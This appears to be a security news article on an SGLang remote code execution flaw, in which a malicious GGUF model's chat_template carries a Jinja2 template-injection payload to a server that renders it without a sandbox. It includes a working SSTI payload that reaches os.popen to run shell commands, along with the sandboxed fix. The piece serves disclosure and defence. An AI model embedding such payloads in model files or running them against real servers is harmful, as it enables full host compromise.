
SGLang CVE-2026-5760 (CVSS 9.8) Enables RCE via Malicious GGUF Model Files
Why It Matters
The vulnerability puts any SGLang deployment that loads external GGUF models at risk of full system compromise, threatening AI‑driven services across cloud and enterprise environments.
Key Takeaways
- CVE‑2026‑5760 enables remote code execution via malicious GGUF files
- The vulnerability resides in the `/v1/rerank` endpoint, which renders Jinja2 templates without sandboxing
- The attack requires a crafted `tokenizer.chat_template` carrying an SSTI payload
- Mitigation: replace `jinja2.Environment()` with `ImmutableSandboxedEnvironment`
Pulse Analysis
SGLang has quickly become a go‑to framework for serving large language models at scale, boasting over 5,500 forks and more than 26,000 stars on GitHub. Its high‑throughput architecture powers chatbots, search rerankers, and multimodal applications across cloud providers and enterprise data centers. The disclosure of CVE‑2026‑5760, a critical vulnerability scored 9.8 on the CVSS scale, therefore threatens a broad swath of AI‑driven services that rely on the `/v1/rerank` endpoint to process user queries. Enterprises that expose SGLang via public APIs risk immediate compromise, as a malicious model can be delivered through popular repositories like Hugging Face.
The flaw stems from SGLang’s use of Jinja2’s default Environment to render the `tokenizer.chat_template` field in GGUF model files. An attacker can embed a server‑side template injection payload that executes arbitrary Python when the template is evaluated during a rerank request. This chain mirrors earlier high‑profile bugs such as Llama Drama (CVE‑2024‑34359) and the vLLM sandbox issue, underscoring a recurring pattern where unsanitized template engines become an attack surface in AI inference pipelines. Because the payload runs with the same privileges as the SGLang process, attackers can exfiltrate data, install backdoors, or pivot to other services on the host.
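The injection mechanics described above can be sketched in a few lines. This is an illustrative reproduction of the underlying Jinja2 behavior, not SGLang's actual rendering code: the payload string and the way the template is loaded are assumptions for demonstration, and the dunder‑traversal payload is one of several well‑known SSTI variants.

```python
# Sketch of the SSTI risk: rendering an attacker-controlled
# chat_template with Jinja2's default Environment. The payload and
# loading code are illustrative, not SGLang's implementation.
import jinja2

# A chat_template as it might appear in a malicious GGUF file's
# tokenizer metadata: the {{ ... }} expression walks from a template
# global ("self") through dunder attributes to Python builtins and
# runs an arbitrary shell command on the server.
malicious_chat_template = (
    "{{ self.__init__.__globals__.__builtins__"
    ".__import__('os').popen('echo pwned').read() }}"
)

# Default Environment: attribute access is unrestricted, so the
# dunder traversal succeeds and the command executes.
env = jinja2.Environment()
rendered = env.from_string(malicious_chat_template).render()
print(rendered.strip())  # command output, not chat text
```

Because Jinja2's default attribute lookup falls back to item lookup, the payload can hop from a bound method's `__globals__` dict into `__builtins__` and reach `__import__`, which is why rendering untrusted templates with a plain `Environment` amounts to evaluating attacker code.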
Mitigation is straightforward: replace the unsafe `jinja2.Environment()` with the sandboxed `ImmutableSandboxedEnvironment` before rendering any user‑supplied templates. Organizations should audit their SGLang deployments, enforce model provenance checks, and apply any upstream patches as soon as they are released. Additionally, deploying container‑level isolation and limiting network egress for inference services can contain potential breaches while longer‑term fixes are rolled out. The episode also serves as a reminder that AI infrastructure must adopt secure coding practices and regular third‑party code reviews to protect against similar supply‑chain exploits.
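As a minimal sketch of that mitigation (the payload is an illustrative SSTI example, not taken from the advisory), rendering the same kind of template through `ImmutableSandboxedEnvironment` causes Jinja2 to reject the underscore‑prefixed attribute access before it can reach builtins:

```python
# Sketch of the mitigation: render untrusted chat templates through
# Jinja2's sandbox instead of the default Environment.
from jinja2.exceptions import SecurityError
from jinja2.sandbox import ImmutableSandboxedEnvironment

# Illustrative SSTI payload of the kind a malicious GGUF
# tokenizer.chat_template could carry.
malicious_chat_template = (
    "{{ self.__init__.__globals__.__builtins__"
    ".__import__('os').popen('id').read() }}"
)

env = ImmutableSandboxedEnvironment()
try:
    env.from_string(malicious_chat_template).render()
    blocked = False
except SecurityError:
    # The sandbox treats underscore-prefixed attributes as unsafe,
    # so the dunder traversal never reaches builtins.
    blocked = True

print("payload blocked:", blocked)
```

The sandboxed environment still renders legitimate chat templates (loops, conditionals, message formatting) normally; only access to internal attributes and other unsafe operations is refused, which makes it a drop‑in replacement for this use case.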